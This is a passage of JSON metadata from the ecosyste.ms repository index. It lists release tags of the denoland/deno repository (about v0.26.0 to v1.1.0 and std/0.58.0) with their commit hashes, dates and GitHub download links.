osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.